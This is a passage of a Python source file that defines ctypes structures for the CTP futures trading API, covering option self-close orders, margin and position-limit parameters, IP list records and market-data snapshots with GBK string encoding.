                setattr(self, field, text.encode("GBK"))
class TradeParam(Struct):
    """CTP trade-parameter record (key/value with memo)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("TradeParamID", c_char),
        ("TradeParamValue", c_char_Array_256),
        ("Memo", c_char_Array_161),
    ]

    def __init__(self, BrokerID=None, TradeParamID=None, TradeParamValue=None, Memo=None):
        """Populate only truthy arguments; all fields are GBK-encoded strings."""
        super().__init__()
        for field, text in (
            ("BrokerID", BrokerID),
            ("TradeParamID", TradeParamID),
            ("TradeParamValue", TradeParamValue),
            ("Memo", Memo),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
class InstrumentMarginRateUL(Struct):
    """Long/short margin ratios (by money and by volume) for an instrument.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so legitimate 0 / 0.0
    ratios are no longer dropped by the generated truthiness checks.
    """
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("HedgeFlag", c_char),
        ("LongMarginRatioByMoney", c_double),
        ("LongMarginRatioByVolume", c_double),
        ("ShortMarginRatioByMoney", c_double),
        ("ShortMarginRatioByVolume", c_double),
    ]
    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class FutureLimitPosiParam(Struct):
    """Futures position-limit parameters (speculative / arbitrage / total open volume).

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so a legitimate 0 volume
    is no longer dropped by the generated truthiness checks.
    """
    _fields_ = [
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ProductID", c_char_Array_31),
        ("SpecOpenVolume", c_int),
        ("ArbiOpenVolume", c_int),
        ("OpenVolume", c_int),
    ]
    def __init__(self, InvestorRange=None, BrokerID=None, InvestorID=None, ProductID=None, SpecOpenVolume=None, ArbiOpenVolume=None, OpenVolume=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class LoginForbiddenIP(Struct):
    """An IP address forbidden from logging in."""
    _fields_ = [
        ("IPAddress", c_char_Array_16),
    ]
    def __init__(self, IPAddress=None):
        super().__init__()
        provided = locals()
        # Store each non-empty string argument as GBK-encoded bytes.
        for field, _ in self._fields_:
            text = provided[field]
            if text:
                setattr(self, field, text.encode("GBK"))
class IPList(Struct):
    """IP list entry with a white/black flag.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so ``IsWhite=0`` is no
    longer dropped by the generated truthiness check.
    """
    _fields_ = [
        ("IPAddress", c_char_Array_16),
        ("IsWhite", c_int),
    ]
    def __init__(self, IPAddress=None, IsWhite=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class InputOptionSelfClose(Struct):
    """Option self-close insertion request.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so ``Volume=0`` or
    ``RequestID=0`` are no longer dropped by the generated truthiness
    checks.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("OptionSelfCloseRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("Volume", c_int),
        ("RequestID", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("HedgeFlag", c_char),
        ("OptSelfCloseFlag", c_char),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("ClientID", c_char_Array_11),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OptionSelfCloseRef=None, UserID=None, Volume=None, RequestID=None, BusinessUnit=None, HedgeFlag=None, OptSelfCloseFlag=None, ExchangeID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, ClientID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class InputOptionSelfCloseAction(Struct):
    """Option self-close action (cancel/modify) request.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so 0-valued ids such as
    ``RequestID=0`` or ``SessionID=0`` are no longer dropped by the
    generated truthiness checks.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OptionSelfCloseActionRef", c_int),
        ("OptionSelfCloseRef", c_char_Array_13),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("OptionSelfCloseSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("UserID", c_char_Array_16),
        ("InstrumentID", c_char_Array_31),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, OptionSelfCloseActionRef=None, OptionSelfCloseRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OptionSelfCloseSysID=None, ActionFlag=None, UserID=None, InstrumentID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class OptionSelfClose(Struct):
    """Full option self-close order record as returned by the trading front.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so 0-valued fields such as
    ``Volume=0``, ``FrontID=0`` or ``SequenceNo=0`` are no longer dropped
    by the generated truthiness checks.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("OptionSelfCloseRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("Volume", c_int),
        ("RequestID", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("HedgeFlag", c_char),
        ("OptSelfCloseFlag", c_char),
        ("OptionSelfCloseLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderSubmitStatus", c_char),
        ("NotifySequence", c_int),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("OptionSelfCloseSysID", c_char_Array_21),
        ("InsertDate", c_char_Array_9),
        ("InsertTime", c_char_Array_9),
        ("CancelTime", c_char_Array_9),
        ("ExecResult", c_char),
        ("ClearingPartID", c_char_Array_11),
        ("SequenceNo", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("UserProductInfo", c_char_Array_11),
        ("StatusMsg", c_char_Array_81),
        ("ActiveUserID", c_char_Array_16),
        ("BrokerOptionSelfCloseSeq", c_int),
        ("BranchID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OptionSelfCloseRef=None, UserID=None, Volume=None, RequestID=None, BusinessUnit=None, HedgeFlag=None, OptSelfCloseFlag=None, OptionSelfCloseLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, OptionSelfCloseSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, ExecResult=None, ClearingPartID=None, SequenceNo=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, ActiveUserID=None, BrokerOptionSelfCloseSeq=None, BranchID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class OptionSelfCloseAction(Struct):
    """Option self-close action record (cancel status, timestamps, ids).

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so 0-valued ids such as
    ``RequestID=0`` or ``InstallID=0`` are no longer dropped by the
    generated truthiness checks.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OptionSelfCloseActionRef", c_int),
        ("OptionSelfCloseRef", c_char_Array_13),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("OptionSelfCloseSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("ActionDate", c_char_Array_9),
        ("ActionTime", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OptionSelfCloseLocalID", c_char_Array_13),
        ("ActionLocalID", c_char_Array_13),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("OrderActionStatus", c_char),
        ("UserID", c_char_Array_16),
        ("StatusMsg", c_char_Array_81),
        ("InstrumentID", c_char_Array_31),
        ("BranchID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, OptionSelfCloseActionRef=None, OptionSelfCloseRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OptionSelfCloseSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, OptionSelfCloseLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, StatusMsg=None, InstrumentID=None, BranchID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryOptionSelfClose(Struct):
    """Query filter for option self-close orders (by instrument, exchange, sys id, time window)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("OptionSelfCloseSysID", c_char_Array_21),
        ("InsertTimeStart", c_char_Array_9),
        ("InsertTimeEnd", c_char_Array_9),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, OptionSelfCloseSysID=None, InsertTimeStart=None, InsertTimeEnd=None):
        super().__init__()
        provided = locals()
        # Store each non-empty string argument as GBK-encoded bytes.
        for field, _ in self._fields_:
            text = provided[field]
            if text:
                setattr(self, field, text.encode("GBK"))
class ExchangeOptionSelfClose(Struct):
    """Exchange-side view of an option self-close order.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so 0-valued fields such as
    ``Volume=0`` or ``SequenceNo=0`` are no longer dropped by the
    generated truthiness checks.
    """
    _fields_ = [
        ("Volume", c_int),
        ("RequestID", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("HedgeFlag", c_char),
        ("OptSelfCloseFlag", c_char),
        ("OptionSelfCloseLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderSubmitStatus", c_char),
        ("NotifySequence", c_int),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("OptionSelfCloseSysID", c_char_Array_21),
        ("InsertDate", c_char_Array_9),
        ("InsertTime", c_char_Array_9),
        ("CancelTime", c_char_Array_9),
        ("ExecResult", c_char),
        ("ClearingPartID", c_char_Array_11),
        ("SequenceNo", c_int),
        ("BranchID", c_char_Array_9),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, Volume=None, RequestID=None, BusinessUnit=None, HedgeFlag=None, OptSelfCloseFlag=None, OptionSelfCloseLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, OptionSelfCloseSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, ExecResult=None, ClearingPartID=None, SequenceNo=None, BranchID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryOptionSelfCloseAction(Struct):
    """Query filter for option self-close actions."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None):
        super().__init__()
        provided = locals()
        # Store each non-empty string argument as GBK-encoded bytes.
        for field, _ in self._fields_:
            text = provided[field]
            if text:
                setattr(self, field, text.encode("GBK"))
class ExchangeOptionSelfCloseAction(Struct):
    """Exchange-side option self-close action record.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so ``InstallID=0`` is no
    longer dropped by the generated truthiness check.
    """
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("OptionSelfCloseSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("ActionDate", c_char_Array_9),
        ("ActionTime", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OptionSelfCloseLocalID", c_char_Array_13),
        ("ActionLocalID", c_char_Array_13),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("OrderActionStatus", c_char),
        ("UserID", c_char_Array_16),
        ("BranchID", c_char_Array_9),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
        ("ExchangeInstID", c_char_Array_31),
        ("OptSelfCloseFlag", c_char),
    ]
    def __init__(self, ExchangeID=None, OptionSelfCloseSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, OptionSelfCloseLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, BranchID=None, IPAddress=None, MacAddress=None, ExchangeInstID=None, OptSelfCloseFlag=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class SyncDelaySwap(Struct):
    """Synchronized delayed currency-swap record.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so legitimate 0.0 amounts
    (e.g. ``FromFrozenSwap=0.0``) are no longer dropped by the generated
    truthiness checks.
    """
    _fields_ = [
        ("DelaySwapSeqNo", c_char_Array_15),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("FromCurrencyID", c_char_Array_4),
        ("FromAmount", c_double),
        ("FromFrozenSwap", c_double),
        ("FromRemainSwap", c_double),
        ("ToCurrencyID", c_char_Array_4),
        ("ToAmount", c_double),
    ]
    def __init__(self, DelaySwapSeqNo=None, BrokerID=None, InvestorID=None, FromCurrencyID=None, FromAmount=None, FromFrozenSwap=None, FromRemainSwap=None, ToCurrencyID=None, ToAmount=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QrySyncDelaySwap(Struct):
    """Query filter for synchronized delayed currency swaps."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("DelaySwapSeqNo", c_char_Array_15),
    ]
    def __init__(self, BrokerID=None, DelaySwapSeqNo=None):
        super().__init__()
        provided = locals()
        # Store each non-empty string argument as GBK-encoded bytes.
        for field, _ in self._fields_:
            text = provided[field]
            if text:
                setattr(self, field, text.encode("GBK"))
class InvestUnit(Struct):
    """Investment-unit record (name, group, commission/margin models, account)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InvestUnitID", c_char_Array_17),
        ("InvestorUnitName", c_char_Array_81),
        ("InvestorGroupID", c_char_Array_13),
        ("CommModelID", c_char_Array_13),
        ("MarginModelID", c_char_Array_13),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InvestUnitID=None, InvestorUnitName=None, InvestorGroupID=None, CommModelID=None, MarginModelID=None, AccountID=None, CurrencyID=None):
        super().__init__()
        provided = locals()
        # Store each non-empty string argument as GBK-encoded bytes.
        for field, _ in self._fields_:
            text = provided[field]
            if text:
                setattr(self, field, text.encode("GBK"))
class QryInvestUnit(Struct):
    """Query filter for investment units."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InvestUnitID=None):
        super().__init__()
        provided = locals()
        # Store each non-empty string argument as GBK-encoded bytes.
        for field, _ in self._fields_:
            text = provided[field]
            if text:
                setattr(self, field, text.encode("GBK"))
class SecAgentCheckMode(Struct):
    """Secondary-agent account check-mode configuration.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so ``CheckSelfAccount=0``
    (flag off) is no longer dropped by the generated truthiness check.
    """
    _fields_ = [
        ("InvestorID", c_char_Array_13),
        ("BrokerID", c_char_Array_11),
        ("CurrencyID", c_char_Array_4),
        ("BrokerSecAgentID", c_char_Array_13),
        ("CheckSelfAccount", c_int),
    ]
    def __init__(self, InvestorID=None, BrokerID=None, CurrencyID=None, BrokerSecAgentID=None, CheckSelfAccount=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class SecAgentTradeInfo(Struct):
    """Secondary-agent trade information (agent id, investor, customer name)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("BrokerSecAgentID", c_char_Array_13),
        ("InvestorID", c_char_Array_13),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, BrokerID=None, BrokerSecAgentID=None, InvestorID=None, LongCustomerName=None):
        super().__init__()
        provided = locals()
        # Store each non-empty string argument as GBK-encoded bytes.
        for field, _ in self._fields_:
            text = provided[field]
            if text:
                setattr(self, field, text.encode("GBK"))
class MarketData(Struct):
    """Market-data snapshot (prices, volume, open interest, limits, timestamps).

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``.  The original generated
    truthiness checks silently dropped perfectly valid zero values
    (``LastPrice=0.0``, ``Volume=0``, ``UpdateMillisec=0``, ...), which
    matters for market data where zeros are common and meaningful.
    """
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("ExchangeInstID", c_char_Array_31),
        ("LastPrice", c_double),
        ("PreSettlementPrice", c_double),
        ("PreClosePrice", c_double),
        ("PreOpenInterest", c_double),
        ("OpenPrice", c_double),
        ("HighestPrice", c_double),
        ("LowestPrice", c_double),
        ("Volume", c_int),
        ("Turnover", c_double),
        ("OpenInterest", c_double),
        ("ClosePrice", c_double),
        ("SettlementPrice", c_double),
        ("UpperLimitPrice", c_double),
        ("LowerLimitPrice", c_double),
        ("PreDelta", c_double),
        ("CurrDelta", c_double),
        ("UpdateTime", c_char_Array_9),
        ("UpdateMillisec", c_int),
        ("ActionDay", c_char_Array_9),
    ]
    def __init__(self, TradingDay=None, InstrumentID=None, ExchangeID=None, ExchangeInstID=None, LastPrice=None, PreSettlementPrice=None, PreClosePrice=None, PreOpenInterest=None, OpenPrice=None, HighestPrice=None, LowestPrice=None, Volume=None, Turnover=None, OpenInterest=None, ClosePrice=None, SettlementPrice=None, UpperLimitPrice=None, LowerLimitPrice=None, PreDelta=None, CurrDelta=None, UpdateTime=None, UpdateMillisec=None, ActionDay=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class MarketDataBase(Struct):
    """Previous-session (pre-) market-data fields.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so 0.0 values (e.g.
    ``PreDelta=0.0``) are no longer dropped by the generated truthiness
    checks.
    """
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("PreSettlementPrice", c_double),
        ("PreClosePrice", c_double),
        ("PreOpenInterest", c_double),
        ("PreDelta", c_double),
    ]
    def __init__(self, TradingDay=None, PreSettlementPrice=None, PreClosePrice=None, PreOpenInterest=None, PreDelta=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class MarketDataStatic(Struct):
    """Intra-day static price fields of a market-data snapshot.

    All fields are numeric; they are stored whenever the argument is not
    ``None``, so legitimate 0.0 prices are no longer dropped by the
    generated truthiness checks.
    """
    _fields_ = [
        ("OpenPrice", c_double),
        ("HighestPrice", c_double),
        ("LowestPrice", c_double),
        ("ClosePrice", c_double),
        ("UpperLimitPrice", c_double),
        ("LowerLimitPrice", c_double),
        ("SettlementPrice", c_double),
        ("CurrDelta", c_double),
    ]
    def __init__(self, OpenPrice=None, HighestPrice=None, LowestPrice=None, ClosePrice=None, UpperLimitPrice=None, LowerLimitPrice=None, SettlementPrice=None, CurrDelta=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is not None:
                setattr(self, name, value)
class MarketDataLastMatch(Struct):
    """Last-trade fields (price, cumulative volume/turnover, open interest).

    All fields are numeric; they are stored whenever the argument is not
    ``None``, so 0 / 0.0 values are no longer dropped by the generated
    truthiness checks.
    """
    _fields_ = [
        ("LastPrice", c_double),
        ("Volume", c_int),
        ("Turnover", c_double),
        ("OpenInterest", c_double),
    ]
    def __init__(self, LastPrice=None, Volume=None, Turnover=None, OpenInterest=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is not None:
                setattr(self, name, value)
class MarketDataBestPrice(Struct):
    """Level-1 best bid/ask of a market-data snapshot.

    All fields are numeric; they are stored whenever the argument is not
    ``None``, so 0 / 0.0 values are no longer dropped by the generated
    truthiness checks.
    """
    _fields_ = [
        ("BidPrice1", c_double),
        ("BidVolume1", c_int),
        ("AskPrice1", c_double),
        ("AskVolume1", c_int),
    ]
    def __init__(self, BidPrice1=None, BidVolume1=None, AskPrice1=None, AskVolume1=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is not None:
                setattr(self, name, value)
class MarketDataBid23(Struct):
    """Depth levels 2-3 on the bid side.

    All fields are numeric; they are stored whenever the argument is not
    ``None``, so 0 / 0.0 values are no longer dropped by the generated
    truthiness checks.
    """
    _fields_ = [
        ("BidPrice2", c_double),
        ("BidVolume2", c_int),
        ("BidPrice3", c_double),
        ("BidVolume3", c_int),
    ]
    def __init__(self, BidPrice2=None, BidVolume2=None, BidPrice3=None, BidVolume3=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is not None:
                setattr(self, name, value)
class MarketDataAsk23(Struct):
    """Depth levels 2-3 on the ask side.

    All fields are numeric; they are stored whenever the argument is not
    ``None``, so 0 / 0.0 values are no longer dropped by the generated
    truthiness checks.
    """
    _fields_ = [
        ("AskPrice2", c_double),
        ("AskVolume2", c_int),
        ("AskPrice3", c_double),
        ("AskVolume3", c_int),
    ]
    def __init__(self, AskPrice2=None, AskVolume2=None, AskPrice3=None, AskVolume3=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is not None:
                setattr(self, name, value)
class MarketDataBid45(Struct):
    """Depth levels 4-5 on the bid side.

    All fields are numeric; they are stored whenever the argument is not
    ``None``, so 0 / 0.0 values are no longer dropped by the generated
    truthiness checks.
    """
    _fields_ = [
        ("BidPrice4", c_double),
        ("BidVolume4", c_int),
        ("BidPrice5", c_double),
        ("BidVolume5", c_int),
    ]
    def __init__(self, BidPrice4=None, BidVolume4=None, BidPrice5=None, BidVolume5=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is not None:
                setattr(self, name, value)
class MarketDataAsk45(Struct):
    """Depth levels 4-5 on the ask side.

    All fields are numeric; they are stored whenever the argument is not
    ``None``, so 0 / 0.0 values are no longer dropped by the generated
    truthiness checks.
    """
    _fields_ = [
        ("AskPrice4", c_double),
        ("AskVolume4", c_int),
        ("AskPrice5", c_double),
        ("AskVolume5", c_int),
    ]
    def __init__(self, AskPrice4=None, AskVolume4=None, AskPrice5=None, AskVolume5=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is not None:
                setattr(self, name, value)
class MarketDataUpdateTime(Struct):
    """Quote timestamp fields of a market-data snapshot.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so ``UpdateMillisec=0`` is
    no longer dropped by the generated truthiness check.
    """
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("UpdateTime", c_char_Array_9),
        ("UpdateMillisec", c_int),
        ("ActionDay", c_char_Array_9),
    ]
    def __init__(self, InstrumentID=None, UpdateTime=None, UpdateMillisec=None, ActionDay=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class MarketDataExchange(Struct):
    """Exchange identifier of a market-data record."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
    ]
    def __init__(self, ExchangeID=None):
        super().__init__()
        provided = locals()
        # Store each non-empty string argument as GBK-encoded bytes.
        for field, _ in self._fields_:
            text = provided[field]
            if text:
                setattr(self, field, text.encode("GBK"))
class SpecificInstrument(Struct):
    """A single instrument identifier (used in subscribe/unsubscribe callbacks)."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
    ]
    def __init__(self, InstrumentID=None):
        super().__init__()
        provided = locals()
        # Store each non-empty string argument as GBK-encoded bytes.
        for field, _ in self._fields_:
            text = provided[field]
            if text:
